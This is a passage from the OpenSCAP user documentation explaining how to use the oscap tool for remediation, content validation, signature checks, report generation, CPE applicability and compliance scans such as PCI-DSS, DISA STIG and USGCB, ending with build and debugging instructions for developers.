\/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n\nThe output of this command consists of two sections. The first section shows the\nresult of the scan prior to the remediation, and the second section shows the\nresult of the scan after applying the remediation. The second part can contain\nonly *fixed* and *error* results. The *fixed* result indicates that the scan performed\nafter the remediation passed. The *error* result indicates that even after\napplying the remediation, the evaluation still does not pass.\n\n==== Offline Remediation\nOffline remediation allows you to postpone fix execution. In the first step, the\nsystem is only evaluated, and the results are stored in a *TestResult* element in\nan XCCDF file.\n\nIn the second step, ```oscap``` executes the fix scripts and verifies the result. It\nis safe to store the results into the input file; no data will be lost. During\noffline remediation, a new *TestResult* element is created that is based\non the input one and inherits all the data. The newly created *TestResult*\ndiffers only in the *rule-result* elements that have failed. For those,\nremediation is executed.\n\nTo perform offline remediation using the _scap-security-guide_ package, run:\n\n----\n$ oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_rht-ccp --results scan-xccdf-results.xml \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n----\n$ oscap xccdf remediate --results scan-xccdf-results.xml scan-xccdf-results.xml\n----\n\n==== Remediation Review\nThe review mode allows users to store remediation instructions in a file for\nfurther review. The remediation content is not executed during this operation.\nTo generate remediation instructions in the form of a shell script, run:\n\n $ oscap xccdf generate fix --template urn:xccdf:fix:script:sh --profile xccdf_org.ssgproject.content_profile_rht-ccp --output my-remediation-script.sh \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n\n\n=== Check Engines\nMost XCCDF content uses the OVAL check engine. This is when OVAL\nDefinitions are being evaluated in order to assess a system. Complete\ninformation about an evaluation is recorded in OVAL Results files, as\ndefined by the OVAL specification. By examining these files it's\npossible to check which definitions were used for the evaluation and why the\nresults are as they are.
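 For example, the following sketch (reusing the SSG data stream and profile from the remediation examples above) stores the OVAL Results files next to the XCCDF results:\n\n----\n$ oscap xccdf eval --oval-results --profile xccdf_org.ssgproject.content_profile_rht-ccp --results results.xml \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n\n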
Please note that these files are not generated\nunless *--oval-results* is used.\n\nSome content may use alternative check engines, for example the\n{sce_web}[SCE] check engine.\n\nResults of rules with a check that requires a check engine not supported\nby OpenSCAP will be reported as *notchecked*. Check contents are not\nread or interpreted in any way unless the check system is known and\nsupported. The following is an evaluation output of an XCCDF document with an unknown\ncheck system:\n\n----\n$ oscap xccdf eval sds-datastream.xml\n\nTitle Check group file contents\nRule xccdf_org.example_rule_system_authcontent-group\nResult notchecked\n\nTitle Check password file contents\nRule xccdf_org.example_rule_system_authcontent-passwd\nResult notchecked\n\nTitle Check shadow file contents\nRule xccdf_org.example_rule_system_authcontent-shadow\nResult notchecked\n\n...\n----\n\nNOTE: The *notchecked* result is also reported for rules that have no\ncheck implemented. *notchecked* means that there was no check in that\nparticular rule that could be evaluated.\n\n\n==== CVE, CCE and other identifiers\nEach XCCDF Rule can have xccdf:ident elements inside. These elements\nallow the content creator to reference various external identifiers like\nCVE, CCE and others.\n\nWhen scanning, oscap outputs the identifiers of scanned rules regardless of\ntheir results. For example:\n\n----\nTitle Ensure Repodata Signature Checking is Not Disabled For Any Repos\nRule rule-2.1.2.3.6.a\nResult pass\n\nTitle Verify user who owns 'shadow' file\nRule rule-2.2.3.1.a\nIdent CCE-3918-0\nResult pass\n\nTitle Verify group who owns 'shadow' file\nRule rule-2.2.3.1.b\nIdent CCE-3988-3\nResult pass\n----\n\nAll identifiers (if any) are printed to stdout for each rule. Since\nstandard output doesn't allow for compact identifier metadata to be\ndisplayed, only the identifiers themselves are displayed there.\n\nIdentifiers are also part of the HTML report output. If the identifier\nis a CVE you can click it to display its metadata from the official NVD\ndatabase (requires an internet connection). OpenSCAP doesn't provide\nmetadata for other types of identifiers.\n\n==== Bundled CCE data\nOpenSCAP does not provide any static or product-bundled CCE data. Thus\nit has no way of displaying the last generated, updated and officially\npublished dates of static or product-bundled CCE data because the dates\nare not defined.\n\n\n\n\n== Advanced oscap usage\n\n=== Validating SCAP Content\nBefore you start using a security policy on your systems, you should first\nverify the policy in order to avoid any possible syntax or semantic errors in\nit. The ```oscap``` tool can be used to validate the security content\nagainst standard SCAP XML schemas. The validation results are printed to the\nstandard error stream (stderr). The general syntax of such a validation command\nis the following:\n\n $ oscap module validate [module_options_and_arguments] file\n\nwhere file is the full path to the file being validated. As a ```module``` you\ncan use:\n\n * xccdf,\n * oval,\n * cpe or\n * cve.\n\n
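For example, a sketch of validating a standalone XCCDF file (the file name is illustrative):\n\n----\n$ oscap xccdf validate scap-xccdf.xml\n----\n\n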
The only exception is the data stream module (ds), which uses the sds-validate\noperation instead of validate. For example:\n\n $ oscap ds sds-validate scap-ds.xml\n\nNOTE: All SCAP components within the given data stream are validated\nautomatically and none of the components is specified separately.\n\nYou can also enable extra Schematron-based validation when validating an OVAL\ndocument. This validation method is slower but it provides deeper analysis.\nRun the following command to validate an OVAL document using Schematron:\n\n $ oscap oval validate --schematron oval-file.xml\n\nThe results of validation are printed to the standard error stream (stderr).\n\nNOTE: Please note that for the rest of the ```oscap``` functionality, unless you specify\n--skip-valid, validation will automatically occur before files are used.\nTherefore, you do not need to explicitly validate a datastream before\nuse.\n\n\n=== SCAP Content Signing and Signature Verification\nThe ```oscap``` tool itself does not do signature verification; it skips over the\nrespective elements. This is due to the fact that there are way too many options\nwhen it comes to keystores and crypto choices. Instead, we recommend using\n{xmlsec}[xmlsec1] to verify your SCAP content. Safely evaluating signed\ncontent (with signature verification) involves the following steps:\n\n1) Install xmlsec1 and at least one of its crypto engines\n----\n# yum install xmlsec1 xmlsec1-openssl\n----\n\n2) Run ```xmlsec1 --verify``` on the content:\n\nThis simple example will only show two specific cases of verifying the\nsignature; the steps may vary depending on which technique was used to\nsign the datastream.\n\nAssuming the datastream was signed with a private key and we have the\nrespective public key to verify it with:\n\n----\n$ xmlsec1 --verify --pubkey-pem pub.key datastream.xml\n----\n\nAssuming the datastream was signed with a certificate and we have the\nrespective public part of the certificate to verify it with:\n\n----\n$ xmlsec1 --verify --pubkey-cert-pem pubcert.key datastream.xml\n----\n\nThere are countless other options; for more details see ```xmlsec1\n--help-verify```.\n\nSuccessful output should look similar to this:\n\n----\n$ xmlsec1 --verify --pubkey-pem key.pub datastream.xml\nOK\nSignedInfo References (ok\/all): 1\/1\nManifests References (ok\/all): 0\/0\n----\n\nAnd the exit code must be 0 before proceeding.\n\n3) If the previous steps resulted in successful verification, proceed\nby evaluating the datastream:\n\n----\n$ oscap xccdf eval datastream.xml\n----\n\nNOTE: If you want to experiment with various crypto engines of xmlsec1, see\n ```xmlsec1-config --help```\n\n\n=== Generating Reports and Guides\nAnother useful feature of ```oscap``` is the ability to generate SCAP content in a\nhuman-readable format. It allows you to transform an XML file\ninto HTML or plain-text format. This feature is used to generate security\nguides and checklists, which serve as a source of information, as well as\nguidance for secure system configuration. The results of system scans can also\nbe transformed into well-readable result reports. 
The general command syntax is\nthe following:\n\n $ oscap module generate sub-module [specific_module\/sub-module_options_and_arguments] file\n\nwhere module is either ```xccdf``` or ```oval```, ```sub-module``` is the type of\nthe generated document, and file represents an XCCDF or OVAL file. A sub-module\ncan be either ```report```, ```guide```, ```custom``` or ```fix```. Please see\n ```man oscap``` for more details.\n\n\n=== Content Transformation\nThe oscap tool is also capable of using the {xslt}[XSLT] (Extensible Stylesheet\nLanguage Transformations) language, which allows transformation of a SCAP\ncontent XML file into another XML, HTML, plain text or {xsl}[XSL] document.\nThis feature is very useful when you need the SCAP document in a\nhuman-readable form. The following commands represent the most common\ncases:\n\n* Creating a guide (see an\nhttp:\/\/mpreisle.fedorapeople.org\/openscap\/guide.html[example]):\n----\n$ oscap xccdf generate guide scap-xccdf.xml > guide.html\n----\n\n* Creating a guide with a profile checklist (see an\nhttp:\/\/mpreisle.fedorapeople.org\/openscap\/guide-checklist.html[example]):\n----\n$ oscap xccdf generate guide --profile Desktop scap-xccdf.xml > guide-checklist.html\n----\n\n* Generating the XCCDF scan report (see an\nhttp:\/\/mpreisle.fedorapeople.org\/openscap\/report-xccdf.html[example]):\n----\n$ oscap xccdf generate report xccdf-results.xml > report-xccdf.html\n----\n\n* Generating the OVAL scan report (see an\nhttp:\/\/mpreisle.fedorapeople.org\/openscap\/report-oval.html[example]):\n----\n$ oscap oval generate report oval-results.xml > report-oval.html\n----\n\n* Generating the XCCDF report with additional information from failed\nOVAL tests (see an\nhttp:\/\/mpreisle.fedorapeople.org\/openscap\/report-xccdf-oval.html[example]):\n----\n$ oscap xccdf generate report --oval-template oval-results.xml xccdf-results.xml > report-xccdf-oval.html\n----\n\n\n=== CPE applicability\nXCCDF rules in the content may target only specific platforms and hold\nno meaning on other platforms. Such an XCCDF rule contains an\n*<xccdf:platform>* element in its body. This element references a CPE\nname or CPE2 platform (defined using **cpe2:platform-specification**)\nthat can be defined in a CPE dictionary file or a CPE language file,\nor it can also be embedded directly in the XCCDF document.\n\nAn XCCDF rule can contain multiple *<xccdf:platform>* elements. It is\ndeemed applicable if at least one of the listed platforms is applicable.\nIf an XCCDF rule contains no *<xccdf:platform>* elements it is considered\nalways applicable.\n\nIf the CPE name or CPE2 platform is defined in an external file, use the\n ```--cpe``` option; ```oscap``` auto-detects the format of the file. 
The following\ncommand is an example of XCCDF content evaluation using a CPE name\nfrom an external file:\n\n----\n$ oscap xccdf eval --results xccdf-results.xml --cpe external-cpe-file.xml xccdf-file.xml\n----\n\nWhere *xccdf-file.xml* is the XCCDF document, *xccdf-results.xml* is a file\ncontaining the scan results, and *external-cpe-file.xml* is the CPE\ndictionary or a language file.\n\nIf you are evaluating a source data stream, ```oscap``` automatically\nregisters all CPEs contained within the data stream. No extra steps have\nto be taken. You can also register an additional external CPE file, as\nshown by the command below:\n\n----\n$ oscap xccdf eval --datastream-id ds.xml --xccdf-id xccdf.xml --results xccdf-results.xml --cpe additional-external-cpe.xml scap-ds.xml\n----\n\nWhere *scap-ds.xml* is a file representing the SCAP data stream\ncollection, *ds.xml* is the particular data stream, *xccdf.xml* is the\nXCCDF document, *xccdf-results.xml* is a file containing the scan\nresults, and *additional-external-cpe.xml* is the additional CPE\ndictionary or language file.\n\nThe ```oscap``` tool will use an OVAL file attached to the CPE dictionary to\ndetermine the applicability of any CPE name in the dictionary.\n\nApart from the instructions above, no extra steps have to be taken for\ncontent using *cpe:fact-ref* or **cpe2:fact-ref**. See the following\nsections for details on resolving.\n\n==== xccdf:platform applicability resolution\n\nWhen a CPE name or language model platform is referenced via\n*<xccdf:platform>* elements, resolution happens in the following order:\n\n . Look into the embedded CPE2 language model; if the name is found and applicable, deem\n it applicable\n . If not found or not applicable, look into external CPE2 language models\n (in order of registration)\n . If not found or not applicable, look into the embedded CPE dictionary\n . If not found or not applicable, look into external CPE dictionaries (in order of\n registration)\n\nIf the CPE name is not found in any of the sources, it is deemed not\napplicable. If it is found in any of the sources but not applicable, we\nlook for it elsewhere.\n\n==== cpe:fact-ref and cpe2:fact-ref resolution\n\nA CPE name referenced from within a fact-ref is resolved in the following\norder:\n\n. Look into the embedded CPE dictionary; if the name is found and applicable,\ndeem it applicable\n. If not found or not applicable, look into external CPE dictionaries\n(in order of registration)\n\n==== Built-in CPE Naming Dictionary\n\nApart from the external CPE dictionaries, ```oscap``` comes with a built-in\nCPE Dictionary. The built-in CPE Dictionary contains only a few products\n(a sub-set of the http:\/\/nvd.nist.gov\/cpe.cfm[Official CPE Dictionary]) and it\nis used as a fall-back option when no other CPE source is found.\n\nThe list of built-in CPE names can be found in the output of\n\n----\n$ oscap --version\n----\n\nYou can file a request to include any additional product in the built-in\ndictionary via the https:\/\/www.redhat.com\/mailman\/listinfo\/open-scap-list[open-scap\nmailing list] or\nhttps:\/\/bugzilla.redhat.com\/enter_bug.cgi?product=Fedora[bugzilla].\n\n\n=== Notes on the Concept of Multiple OVAL Values\nThis section describes advanced concepts of OVAL Variables and their\nimplementation in ```oscap```. 
The SCAP specification allows for an OVAL\nvariable to have multiple values during a single assessment run. There\nare two variable modes, which can be combined:\n\n* Multival -- A variable is assigned multiple values at the same\ntime. As an example, consider a variable which refers to the preferred\npermissions of a given file, which may take multiple values like '600' and\n'400'. The evaluation tries to match each (or all) and then outputs a\nsingle OVAL Definition result.\n* Multiset -- A variable is assigned a different value (or\nmultival) for different evaluations. This is known as a\n*variable_instance*. As an example, consider an OVAL definition which\nchecks that a package given by a variable is not installed. For the first\nevaluation of the definition, the variable can be assigned the\n'telnet-server' value; for the second evaluation, the variable can be assigned the\n'tftp-server' value. Therefore both evaluations may output different\nresults. Thus, the OVAL Results file may contain multiple results for\nthe same definition; these are distinguished by the *variable_instance*\nattribute.\n\nThese two concepts are a source of confusion for both the content\nauthors and the result consumers. On one hand, the first concept is well\nsupported by the standard and the OVAL Variable file format. It allows\nmultiple *<value>* elements for each *<variable>* element. On the other\nhand, the second concept is not supported by the OVAL Variable schema,\nwhich prevents fully automated evaluation of the multisets (unless you\nuse XCCDF to bridge that gap).\n\nTIP: ```oscap``` supports both variable modes as described below.\n\n==== Sources of Variable Values\nFirst we need to understand how a single value can be bound to a\nvariable in the OVAL checking engine. There are three ways to do this:\n\n1) OVAL Variables File -- The values of external variables can be\ndefined in an external file. Such a file is called an OVAL Variable File\nand can be recognized by using the following command: `oscap info\nfile.xml`. The OVAL Variables file can be passed to the evaluation by the\n ```--variables``` argument such as:\n----\n$ oscap oval eval --variables usgcb-rhel5desktop-oval.xml-0.variables-0.xml --results usgcb-results-oval.xml usgcb-rhel5desktop-oval.xml\n----\n\n2) XCCDF Bindings -- The values of external variables can be given from\nan XCCDF file. In the XCCDF file, within each *<xccdf:check>* element,\nthere might be *<xccdf:check-export>* elements. These elements allow\nthe transition of *<xccdf:value>* elements to *<oval:variables>* elements. The\nfollowing command allows users to export variable bindings from XCCDF to\nan OVAL Variables file:\n----\n$ oscap xccdf export-oval-variables --profile united_states_government_configuration_baseline usgcb-rhel5desktop-xccdf.xml\n----\n\n3) Values within an OVAL Definition File -- Variable values can be defined\ndirectly in the OVAL Definition file using *<constant_variable>* and\n*<local_variable>* elements.\n\n==== Evaluation of Multiple OVAL Values\nWith ```oscap```, there are two possible ways to specify two or more values\nfor a variable used by one OVAL definition. 
The approach you choose\ndepends on which mode you want to use, multival or multiset.\n\nThe ```oscap``` tool handles multiple OVAL values seamlessly; the user doesn't\nneed to do anything differently from a normal scan.\nThe command below demonstrates evaluation of a data stream which may include\nmultiset, multival, both concepts combined, or none of them.\n----\n$ oscap xccdf eval --profile my_baseline --results-arf scap-arf.xml --cpe additional-external-cpe.xml scap-ds.xml\n----\n\n==== Multival\nMultival can pass multiple values to a single OVAL definition\nevaluation. This can be accomplished in all three ways described in the\nprevious section.\n\n1) OVAL Variables file -- This option is straightforward. The file\nformat (XSD schema) allows for multiple *<value>* elements within each\n*<variable>* element.\n\n----\n <variable id=\"oval:com.example.www:var:1\" datatype=\"string\" comment=\"Unknown\">\n <value>600<\/value>\n <value>400<\/value>\n <\/variable>\n----\n\n2) XCCDF Bindings -- Use multiple *<xccdf:check-export>* elements referring to the\nvery same OVAL variable, binding it to multiple different XCCDF values.\n----\n <check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\">\n <check-export value-id=\"xccdf_com.example.www_value_1\" export-name=\"oval:com.example.www:var:1\"\/>\n <check-export value-id=\"xccdf_com.example.www_value_2\" export-name=\"oval:com.example.www:var:1\"\/>\n <check-content-ref href=\"my-test-oval.xml\" name=\"oval:com.example.www:def:1\"\/>\n <\/check>\n----\n\n3) Values within an OVAL Definitions file -- This is similar to using a\nVariables file; there are multiple *<value>* elements allowed within the\n*<constant_variable>* or *<local_variable>* elements.\n\n==== Multiset\nMultiset allows for the very same OVAL definition to be evaluated\nmultiple times using different values assigned to the variables for each\nevaluation. In OpenSCAP, this is only possible via option (2), XCCDF\nBindings. The following XCCDF snippet evaluates the very same OVAL\ndefinition twice; each time it binds a different value to the OVAL variable.\n\n----\n <Rule id=\"xccdf_moc.elpmaxe.www_rule_1\" selected=\"true\">\n <check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\">\n <check-export value-id=\"xccdf_moc.elpmaxe.www_value_1\" export-name=\"oval:com.example.www:var:1\"\/>\n <check-content-ref href=\"my-test-oval.xml\" name=\"oval:com.example.www:def:1\"\/>\n <\/check>\n <\/Rule>\n <Rule id=\"xccdf_moc.elpmaxe.www_rule_2\" selected=\"true\">\n <check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\">\n <check-export value-id=\"xccdf_moc.elpmaxe.www_value_2\" export-name=\"oval:com.example.www:var:1\"\/>\n <check-content-ref href=\"my-test-oval.xml\" name=\"oval:com.example.www:def:1\"\/>\n <\/check>\n <\/Rule>\n----\n\nAfter the evaluation, the OVAL results file will contain multiple\nresult-definitions, multiple result-tests and multiple\ncollected-objects. 
The elements of the same id will be differentiated by\nthe value of the *variable_instance* attribute. Each of the\ndefinitions\/tests\/objects might have a different evaluation result.\nThe following snippet of an OVAL results file illustrates the output of a\nmultiset evaluation.\n\n----\n <tests>\n <test test_id=\"oval:com.example.www:tst:1\" version=\"1\" check=\"at least one\" result=\"true\" variable_instance=\"1\">\n <tested_item item_id=\"1117551\" result=\"true\"\/>\n <tested_variable variable_id=\"oval:com.example.www:var:1\">600<\/tested_variable>\n <\/test>\n <test test_id=\"oval:com.example.www:tst:1\" version=\"1\" check=\"at least one\" result=\"false\" variable_instance=\"2\">\n <tested_item item_id=\"1117551\" result=\"false\"\/>\n <tested_variable variable_id=\"oval:com.example.www:var:1\">400<\/tested_variable>\n <\/test>\n <\/tests>\n----\n\n\n\n\n== Practical Examples\nThis section demonstrates practical usage of certain security content provided\nfor Red Hat products.\n\nThese practical examples show usage of industry-standard checklists that\nwere validated by NIST.\n\n=== Auditing System Settings with SCAP Security Guide\nThe SSG project contains guidance for settings of Red Hat Enterprise Linux 7.\n\n1) Install the SSG\n\n $ sudo yum install -y scap-security-guide\n\n2) To inspect the security content use the ```oscap info``` module:\n\n $ oscap info \/usr\/share\/xml\/scap\/ssg\/rhel7\/ssg-rhel7-ds.xml\n\nThe output of this command contains the available configuration profiles. To audit\nyour system settings, choose the\n ```xccdf_org.ssgproject.content_profile_rht-ccp``` profile and run the\nevaluation command. For example, the following command is used to assess\nthe given system against a draft SCAP profile for Red Hat Certified Cloud\nProviders:\n\n $ oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_rht-ccp --results ssg-rhel7-xccdf-result.xml --report ssg-rhel7-report.html \/usr\/share\/xml\/scap\/ssg\/rhel7\/ssg-rhel7-ds.xml\n\n\n=== Auditing Security Vulnerabilities of Red Hat Products\nThe Red Hat Security Response Team provides OVAL definitions for all\nvulnerabilities (identified by CVE name) that affect Red Hat Enterprise\nLinux 3, 4, 5, 6 and 7. This enables users to perform a vulnerability scan\nand diagnose whether the system is vulnerable or not.\n\n1) Download the content\n----\n$ wget http:\/\/www.redhat.com\/security\/data\/metrics\/com.redhat.rhsa-all.xccdf.xml\n$ wget http:\/\/www.redhat.com\/security\/data\/oval\/com.redhat.rhsa-all.xml\n----\n\n2) Run the scan\n----\n$ oscap xccdf eval --results results.xml --report report.html com.redhat.rhsa-all.xccdf.xml\n----\n\nThis is a sample output. 
It reports that a Red Hat Security\nAdvisory (RHSA-2013:0911) was issued, but the update was not applied, so the\nsystem is affected by multiple CVEs (CVE-2013-1935, CVE-2013-1943,\nCVE-2013-2017).\n\n----\nTitle RHSA-2013:0911: kernel security, bug fix, and enhancement update (Important)\nRule oval-com.redhat.rhsa-def-20130911\nIdent CVE-2013-1935\nIdent CVE-2013-1943\nIdent CVE-2013-2017\nResult fail\n----\n\nNOTE: Note that these OVAL definitions are designed to only cover software and\nupdates released by Red Hat. You need to provide additional definitions in order\nto detect the patch status of third-party software.\n\n\nThe human-readable report *report.html* is generated alongside the machine-readable\nreport **results.xml**. Both files hold information about the vulnerability\nstatus of the scanned system. They map RHSAs to CVEs and report\nwhich security advisories are not applied. CVE identifiers are linked\nto the National Vulnerability Database, where additional information such as\nthe CVE description, CVSS score and CVSS vector is stored.\n\nTo find out more information about this project, see\nhttp:\/\/www.redhat.com\/security\/data\/metrics\/.\n\n\n=== How to Evaluate PCI-DSS on RHEL7\nThis section describes how to evaluate the Payment Card Industry Data Security\nStandard (PCI-DSS) on Red Hat Enterprise Linux 7.\n\n1) Install SSG which provides the PCI-DSS SCAP content\n\n $ sudo yum install -y scap-security-guide\n\n2) Verify that the PCI-DSS profile is present\n\n $ oscap info \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n\n3) Evaluate the PCI-DSS content\n\n $ oscap xccdf eval --results results.xml --profile xccdf_org.ssgproject.content_profile_pci-dss \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n\n4) Generate a report readable in a web browser.\n\n $ oscap xccdf generate report --output report.html results.xml\n\n=== How to Evaluate DISA STIG\nThis section describes how to evaluate the Defense Information Systems Agency\n(DISA) Security Technical Implementation Guide (STIG) on Red Hat Enterprise\nLinux 6.\n\n1) Download the DISA STIG content.\n----\n$ wget http:\/\/iasecontent.disa.mil\/stigs\/zip\/July2015\/U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark.zip\n----\n\n2) Unpack the content.\n----\n$ unzip U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark.zip\n----\n\n3) Fix the content using a sed substitution.\n----\n$ sed -i 's\/<Group\\ \\(.*\\)\/<Group\\ selected=\"false\"\\ \\1\/g' U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml\n----\n\nNOTE: Why is the substitution needed? According to the {xccdf_1-2}[XCCDF\nspecification 1.2] the ```selected``` attribute for a *Rule* or *Group* is *true* by default.\nIt means that if you create a new profile with even only one rule selected, all\nrules within the benchmark will be evaluated because they are set to true by default.
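 As an illustration, the substitution rewrites an opening tag such as `<Group id=\"group-1\">` (the ID is hypothetical) into `<Group selected=\"false\" id=\"group-1\">`.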
 The\nsubstitution will set all Groups as unselected by default, which means all\ndescendants will also be unselected by default.\n\n4) Display a list of available profiles.\n\n $ oscap info U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml\n\n5) Evaluate your favorite profile, for example *MAC-1_Public*, and write\nthe XCCDF results into the results.xml file.\n----\n$ oscap xccdf eval --profile MAC-1_Public --results results.xml --cpe U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-cpe-dictionary.xml U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml\n----\n\n6) Generate a scan report that is readable in a web browser.\n----\n$ oscap xccdf generate report --output report.html results.xml\n----\n\nIf you are interested in DISA STIG content for RHEL5 or RHEL7 please visit the\n{nvd}[National Vulnerability Database] and look for *Red Hat Enterprise Linux 5*\nor *Red Hat Enterprise Linux 7* as a target product.\n\n=== How to Evaluate United States Government Configuration Baseline (USGCB)\nNOTE: NIST offers no official USGCB for RHEL6 as of September 2014, but you can\nacquire the content from the {ssg_git}[SSG] project.\n\nThe USGCB content represents a Tier IV checklist for Red Hat\nEnterprise Linux 5 (as defined by NIST Special Publication 800-70).\n\nWARNING: Proper evaluation of the USGCB document requires OpenSCAP version 0.9.1\nor later.\n\nAfter ensuring that the version of OpenSCAP on your system is\nsufficient, perform the following tasks:\n\n1) Download the USGCB content.\n----\n$ wget http:\/\/usgcb.nist.gov\/usgcb\/content\/scap\/USGCB-rhel5desktop-1.2.5.0.zip\n----\n\n2) Unpack the USGCB content.\n----\n$ unzip USGCB-rhel5desktop-1.2.5.0.zip\n----\n\n3) Run evaluation of the USGCB content.\n----\n$ oscap xccdf eval --profile united_states_government_configuration_baseline --cpe usgcb-rhel5desktop-cpe-dictionary.xml --oval-results --fetch-remote-resources --results results.xml usgcb-rhel5desktop-xccdf.xml\n----\n\n4) Generate a scan report that is readable in a web browser.\n----\n$ oscap xccdf generate report --output report.html results.xml\n----\n\nAdditional reports can be generated from the detailed OVAL result files.\nThe scanner outputs OVAL result files into the current directory; for each\nOVAL file on input there is one output file. In the case of USGCB, there is\none OVAL file distributed along with the XCCDF and another one which is\ndownloaded from the Red Hat repository. The latter contains CVE information\nfor each evaluated definition.\n\n----\n$ oscap oval generate report --output oval-report-1.html usgcb-rhel5desktop-oval.xml.result.xml\n$ oscap oval generate report --output oval-report-2.html http%3A%2F%2Fwww.redhat.com%2Fsecurity%2Fdata%2Foval%2Fcom.redhat.rhsa-all.xml.result.xml\n----\n\nIf you're interested in running evaluation of the USGCB on a remote machine using\na GUI please see the\nhttps:\/\/open-scap.org\/resources\/documentation\/evaluate-remote-machine-for-usgcb-compliance-with-scap-workbench\/[Evaluate\nRemote Machine for USGCB Compliance with SCAP Workbench] tutorial.\n\n\n=== How to Evaluate Third-Party Guidances\nThe SCAP content repository hosted at the {nvd}[National Vulnerability Database]\n(NVD) can be searched for publicly available guidances for a given\nproduct. 
For example, as of 2013\/05\/11 there are\nhttp:\/\/web.nvd.nist.gov\/view\/ncp\/repository?tier=3&product=Red+Hat+Enterprise+Linux+5[two]\nTier III checklists for Red Hat Enterprise Linux 5. Analogously, the\nMITRE Corp. hosts a http:\/\/oval.mitre.org\/rep-data\/[repository] of OVAL\ncontent for various platforms, sorted by versions and classes.\n\nLike the USGCB, any downloaded guidance can be evaluated by\nOpenSCAP.\n\n* Example evaluation of the DoD Consensus Security Configuration Checklist\nfor Red Hat Enterprise Linux 5 (2.0)\n----\n$ wget http:\/\/nvd.nist.gov\/ncp\/DoD-RHEL5-desktop.zip\n$ unzip DoD-RHEL5-desktop.zip\n$ oscap xccdf eval --profile DOD_baseline_1.0.0.1 --cpe dcb-rhel5_cpe-dictionary.xml --results result.xml --oval-results dcb-rhel5_xccdf.xml\n----\n\n* Example evaluation of the Red Hat 5 STIG Benchmark (Version 1, Release 12)\n----\n$ wget http:\/\/iasecontent.disa.mil\/stigs\/zip\/July2015\/U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark.zip\n$ unzip U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark.zip\n$ oscap xccdf eval --profile MAC-2_Public --cpe\nU_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark-cpe-dictionary.xml --results result.xml\n--oval-results U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark-xccdf.xml\n----\n\nFurthermore, any individual file from the archive can be inspected using\nthe `oscap info` command. The oscap program does not have\nthe concept of importing SCAP files, therefore it can process any SCAP\nfiles available on the filesystem. That is possible because the SCAP\nstandard files are native file formats of OpenSCAP.\n\n\n\n=== How to evaluate guidances for Red Hat Enterprise Linux 6\nGuidances for Red Hat Enterprise Linux 6 can be acquired from the\n{ssg_git}[SCAP Security Guide\nproject] (SSG). SSG currently holds the most evolved and elaborate SCAP\npolicy for Linux systems. The project provides practical security\nhardening advice for Red Hat products and also links it to compliance\nrequirements in order to ease deployment activities, such as\ncertification and accreditation.\n\nThe project started in 2011 as an open collaboration of U.S. Government\nbodies to develop the next generation of the United States Government Baseline\n(USGCB) available for Red Hat Enterprise Linux 6. There are multiple\nparties contributing to the project from the public sector and private\nsector.\n\nThe SSG project contains baselines for both desktops and servers. See\nhttps:\/\/github.com\/OpenSCAP\/scap-security-guide\n\n\n\n[[devs]]\n== Developer's operations\nThis part of the documentation is meant to serve mainly developers who want to\ncontribute to ```oscap```, help to fix bugs, or take advantage of\nthe OpenSCAP library and create their own projects on top of it.\n\n[[devs-compiling]]\n=== Compiling\nIf you want to build the ```libopenscap``` library and the ```oscap``` tool from\nthe {oscap_git}[source code] then follow these instructions:\n\n1) Get the latest source code\n\n $ git clone https:\/\/github.com\/OpenSCAP\/openscap.git\n\n2) Run the following script.\n\n $ .\/autogen.sh\n\nNOTE: The *autoconf*, *automake*, and *libtool* tools are required to be\ninstalled on your system. If you use a release tarball, you can skip this step.\n\n3) Run the following commands to build the library.\n\n $ .\/configure\n $ make\n\nBuild dependencies may vary
 depending on the enabled features (selected by the ```configure``` command). By default, you need the following packages\ninstalled on your system:\n\n\n* swig\n* libxml2-devel\n* rpm-devel\n* libgcrypt-devel\n* pcre-devel\n* python-devel\n* perl-devel\n* libcurl-devel\n* libxslt-devel\n* libtool\n* perl-XML-XPath\n\n4) Run library self-checks by executing the following command.\n\n # make check\n\n5) Run the installation procedure by executing the following command.\n\n # make install\n\nIf you want to create a package for a Fedora or Red Hat Enterprise Linux\ndistribution, you will need the respective spec files. These spec files are\navailable under the following directories:\n\n* dist\/fedora\n* dist\/rhel5\n* dist\/rhel6\n\n=== Debugging\nDevelopers and users who intend to help find and fix possible bugs in OpenSCAP\nshould follow these instructions on how to enable debugging in OpenSCAP:\n\n==== Debug mode\nThe first and obvious step is to re-compile the library so that debug mode is\nenabled.\n\n----\n$ .\/configure --enable-debug && make\n----\n\nDebug mode provides:\n\n* debug symbols on and optimization off - you can use ```gdb```,\n* logs - the ```oscap``` tool will generate *oscap_debug.log.\\{pid}* log files for\nevery process that was run,\n* http:\/\/www.gnu.org\/software\/gawk\/manual\/html_node\/Assert-Function.html[assertions]\nare evaluated.\n\n==== Testing library\nThe next important step is to preload ```libopenscap_testing.so``` before you run\nthe ```oscap``` tool. The testing library allows you to specify a custom path to\nthe probes via the *OVAL_PROBE_DIR* environment variable. The easiest way to\nachieve that, without the need to install libopenscap, is to use the shell\nscript called *run* in the OpenSCAP directory.\n\n----\n$ .\/run utils\/.libs\/oscap xccdf eval ... whatever\n----\n\nThe *run* script is generated at configure time and it sets:\n\n* *LD_PRELOAD* and *LD_LIBRARY_PATH* - preload ```libopenscap_testing.so```\n* *OVAL_PROBE_DIR* - path to probes\n* *OSCAP_SCHEMA_PATH* - path to XCCDF, 